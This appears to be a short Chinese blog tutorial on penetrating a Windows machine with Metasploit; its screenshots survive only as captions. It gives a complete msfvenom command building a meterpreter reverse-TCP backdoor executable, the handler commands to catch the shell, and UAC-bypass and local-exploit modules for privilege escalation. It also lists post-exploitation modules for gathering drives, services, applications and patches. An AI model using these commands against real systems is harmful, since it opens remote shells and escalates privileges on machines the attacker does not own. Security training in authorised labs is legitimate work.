msf windows简单渗透

建立后门

一 建立反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f exe >shell.exe

二 监听端口建立回话

1 使用handler模块

msf > use exploit/multi/handler

2 设置payload

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

PAYLOAD =>windows/meterpreter/reverse_tcp

3 设置监听主机

msfexploit(multi/handler) > set LHOST 192.168.1.8

LHOST =>192.168.1.8

4 设置监听端口(默认4444)

msfexploit(multi/handler) > set LPORT 4444

LPORT => 4444

5 发动攻击

msfexploit(multi/handler) > exploit  # (或者run)

三 目标机器执行shell后门脚本

msf windows简单渗透_第1张图片获得一个普通用户权限

尝试提权失败
在这里插入图片描述权限提升思路:

  1. 提高程序运行级别
  2. Uac绕过
  3. 利用提权漏洞进行绕过

权限提升

exploit/windows/local/ask

msf windows简单渗透_第2张图片执行完后,目标机器就会弹出
msf windows简单渗透_第3张图片
我们就会获得一个新的session
msf windows简单渗透_第4张图片
再次尝试提权就会成功

msf windows简单渗透_第5张图片另一种权限提升思路:
UAC绕过
msf模块:

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs

我们使用第一个模块:

use exploit/windows/local/bypassuac

设置低权限的session

msf5 exploit(windows/local/bypassuac) > set session 1

开始执行,发现提权成功
msf windows简单渗透_第6张图片

利用提权漏洞进行提权:
exploit/windows/local/ms14_058_track_popup_menu

提权失败,看提示信息这种漏洞只支持32位的操作系统,而目标机器是64位的

msf windows简单渗透_第7张图片利用模块

exploit/windows/local/ms16_016_webdav

该模块同样不支持64位操作系统

msf windows简单渗透_第8张图片

信息收集

msf 模块
获取目标机器的分区情况:

post/windows/gather/forensics/enum_drives

msf windows简单渗透_第9张图片

判断是否为虚拟机:

post/windows/gather/checkvm

msf windows简单渗透_第10张图片

开启了哪些服务:

post/windows/gather/enum_services

msf windows简单渗透_第11张图片

安装了哪些应用:

posst/windows/gather/enum_applications

msf windows简单渗透_第12张图片

查看共享:

post/windows/gather/enum_applications

获得主机最近的系统操作:

post/windows/gather/dumplinks

查看补丁:

post/windows/gather/enum_patches

自动化脚本:

scraper脚本
Winenum脚本

参考文章:
https://blog.csdn.net/u012991692/article/details/80784258

你可能感兴趣的:(msf,提权)